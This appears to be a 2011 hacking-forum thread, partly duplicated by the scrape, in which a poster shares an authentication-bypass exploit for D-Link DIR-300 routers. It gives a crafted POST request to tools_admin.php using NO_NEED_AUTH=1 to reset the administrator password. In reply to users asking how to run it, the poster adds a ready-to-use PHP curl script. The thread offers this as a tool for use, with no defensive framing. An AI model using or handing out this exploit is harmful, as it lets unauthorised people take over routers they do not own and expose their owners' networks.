Change D-Link DIR-300 (and others) routers password

**Google** · 02-09-2011

Control panel script - tools_admin.php allows attacker to change
administrator name, password and other variables without any
authorization by sending specially crafted http post request such as:

---cut here---
POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
Host: 192.168.1.2
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&logi n=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name= admin&admin_password1=uhOHahEh
---cut here---

Enjoy

gachkar · 02-09-2011

hey thanks for the post !
byut how to use it ? where to save it ? to what extension ?

**Google** · 02-10-2011

Quote:

Originally Posted by gachkar

hey thanks for the post !
byut how to use it ? where to save it ? to what extension ?

That was the HTTP POST request. You can send it using any language like PHP, PERL, PYTHON... That's the PHP code:

Code:

<?php if(sizeof($argv)!=4) { echo "Usage: php5 $argv[0] <router ip addres> <port> <admin password>\n"; exit; } $ch=curl_init(); curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_PORT, $argv[2]); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS,"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3])); echo "+ starting request\n"; $out = curl_exec($ch); if($out===false) { echo "- Error: could not connect ( http://$argv[1]:$argv[2]/tools_admin.php).\n"; exit; } else echo "+ request sended\n"; curl_close($ch); if(stripos($out,"login.php")===true) { echo "- something goes wrong (check answer - answer.html) !\n"; $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f); exit; } else echo "+ ok, now you can login using l: admin p:$argv[3]\n"; ?>

If you want, I will make an GUI executable file and post it here later.

yaleil · 02-13-2011

can you do that please?

**Google** · 02-17-2011

Quote:

Originally Posted by yaleil

can you do that please?

Here it is. But don't pwn yourself

02-09-2011	#1
Google Last Online: 05-30-2013 Join Date: Jan 2008 Posts: 1,788 Thanks: 10,018 Thanked 1,100 Times in 651 Posts Groans: 1 Groaned at 6 Times in 6 Posts	Change D-Link DIR-300 (and others) routers password Control panel script - tools_admin.php allows attacker to change administrator name, password and other variables without any authorization by sending specially crafted http post request such as: ---cut here--- POST http://192.168.1.1:80/tools_admin.php HTTP/1.1 Host: 192.168.1.2 Keep-Alive: 115 Content-Type: application/x-www-form-urlencoded Content-length: 0 ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&logi n=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name= admin&admin_password1=uhOHahEh ---cut here--- Enjoy __________________

02-09-2011	#2
gachkar Registered Member Last Online: 04-10-2012 Join Date: May 2006 Posts: 16 Thanks: 0 Thanked 3 Times in 3 Posts Groans: 0 Groaned at 0 Times in 0 Posts	hey thanks for the post ! byut how to use it ? where to save it ? to what extension ?

02-13-2011	#4
yaleil Registered Member Last Online: 04-28-2013 Join Date: Apr 2006 Posts: 357 Thanks: 4 Thanked 10 Times in 10 Posts Groans: 0 Groaned at 0 Times in 0 Posts	can you do that please?

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)